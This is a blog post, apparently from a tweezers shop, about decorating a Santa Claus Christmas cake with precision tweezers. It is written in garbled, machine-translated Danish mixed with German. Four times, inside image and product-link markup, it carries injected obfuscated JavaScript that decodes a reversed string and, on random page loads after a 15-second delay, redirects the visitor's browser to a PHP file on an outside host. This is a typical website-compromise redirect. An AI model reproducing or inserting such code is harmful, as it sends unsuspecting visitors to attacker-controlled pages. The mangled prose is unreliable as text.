CHRISTMAS Bageri - SANTA CLAUS kage med en GERALD pincetter gennemført I køkkenet

En masse mennesker har derhjemme en pincet. I de fleste tilfælde er dette imidlertid i tilfælde af behov på det forkerte sted.. Pincet skal ikke kun i dig medicinskabet, er i badeværelset eller hule.. Einige sollten auch in der Küche vorhanden sein. Pincet er fremragende værktøjer til en række forskellige opgaver, ikke kun for øjenbryn plukning eller fjernelse splinter. faktisk, Pincet bred dagsorden, die eine präzise Hand benötigen. Fra perfekt kage dekoration at slippe af blokerede afløb, læse om at lære om de innovative måder for pincet kender.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) ==string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andizing/wp-content/uploads/sites/3/2015/12/christmas-992576_1920.jpgdata-slimstat-tracking=truedata-slimstat-callback=truedata-slimstat-type=”0″>$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) ==string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andizing/wp-content/uploads/sites/3/2015/12/christmas-992576_1920-1024×768.jpg?resize=640%2C480alt=”jul santa claus kage” width=”600″ height=”450″ />

Risikere det ikke din julemanden kage

Hvad går for en overraskelse for gæsterne og børn. Jeg har elsket $p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) ==string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andizing/product/gerald-forceps-tux-label-antimagnetic-soldering-tweezers-17-5-cm-ultrafine-tip-0-5-mm-2 /” target=_blankdata-slimstat-tracking=truedata-slimstat-callback=falsedata-slimstat-type=”0″>Gerald Pinzette meines Göttergatten zu verwenden blev fjernet fra sit hobbyrum. Dog havde jeg det til brug i køkkenet at rengøre og desinficere for det ... :rulle: Til øjnene af det sidste skridt til at placere på kagen, det slog mig som en for høj risiko for dette at gøre med mine sædvanlige pincet og så jeg valgte hans præcisionstænder pincet..

Du kan være sikker på mine venner, disse pincet er nu på mit køkken ønskeliste.
Mens den dekoration havde ichwirklich føler, som en rigtig professionel til at arbejde, og resultatet kan være stolte af. Hver gæst har kun en gang lavet med sin mobil et øjebliksbillede, før kagen gaffel kom nær Dekokuchens..

“I was using tweezers to handle a thin stream of strawberry purée frozen with liquid nitrogen because if you touch it, it falls apart,”, siger Grant Achatz, kokken på Alinea, i Chicago i denne THE NEW YORK TIMES artiklen. “Tweezers allow boundary-pushing with scale and texture.”

Udsmykning af kage og fødevarer plader.

Hvis fint, præcist arbejde er nødvendigt på en kage eller en gallamiddag at se professionel ? Pincet er din ven!
I high-end restauranter rundt omkring i verden, brug kokke Pincet, til perfekt dekorere deres retter og plader. For bagere blandt os, Pincet er på mode., Simple pincet er ofte tilstrækkelig til Trappieren med “kærlighed perler” og anderem dekorativem Material um Eure Kuchen zu verschönern. Men det er en god fornemmelse for sjælen, professionelle pincet som $p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) ==string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andizing/product/gerald-forceps-tux-label-antimagnetic-soldering-tweezers-17-5-cm-ultrafine-tip-0-5-mm-2 /” target=_blankdata-slimstat-tracking=truedata-slimstat-callback=falsedata-slimstat-type=”0″>Gerald Pinzette meines Göttergatten zu verwenden. Og det er virkelig bedre end de billige dele fra junk shop for 2.- Euro. Ikke kun læger, hvorfor de lagt så meget vægt på godt værktøj…...